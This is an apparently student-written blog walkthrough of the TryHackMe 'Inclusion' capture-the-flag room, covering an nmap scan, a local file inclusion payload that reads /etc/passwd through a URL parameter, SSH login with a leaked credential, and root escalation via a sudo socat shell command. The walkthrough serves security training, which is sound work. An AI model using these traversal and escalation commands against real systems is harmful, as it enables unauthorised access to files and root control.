This is a write up covering steps taken to solve a beginner level security challenge on local file inclusion : Inclusion room in TryHackMe platform.
This blog is written as part of task of Masters Certification in Red Team Program from HackerU.
Step 1 : Connect to TryHackMe and start target machine.
- Download OpenVPN configuration setting from TryHackMe platform
- Connect to TryHackMe by running the command in kali terminal:
sudo openvpn /pathtoOVPNfile.ovpn
3. Start machine in ‘inclusion’ room — target ip address will be displayed in a minute.
Step 2 : Information gathering using Nmap
- Start nmap scan of the target ip:
nmap -A -O <target ip>
Step 3: Detailed Findings
Open ports:
22 : SSH OpenSSH 7.6psi
80 : http Werkzeug httpd 0.16.0
1. Accessing open ports
port 80
2. Click on View details under ‘LFI-attack’, got a hint for exploring LFI
3. Accessing ../../../../etc/passwd by entering it in url for ‘name’ parameter
http://10.10.xx.xxx/article?name=../../../../etc/passwd
passwd file is displayed which has 1 user with password highlighted below
4. As port 22 is open, attempted SSH login with found user name and password and login was successful.
ssh <username>@<targetip>
5. Found user.txt flag
6. To find root flag, checked for sudo privileges, found root NOPASSWD permission for /usr/bin/socat
sudo -l
7. As user can gain root access through socat, search for sudo command to gain privileges in gtfobin
8. Run below command in kali, user gains root access
sudo socat stdin exec:/bin/sh
9. Navigate to root folder and found root.txt
With these steps, I was able to answer questions posted in inclusion room on TryHackMe.
Thank you for reading this blog..
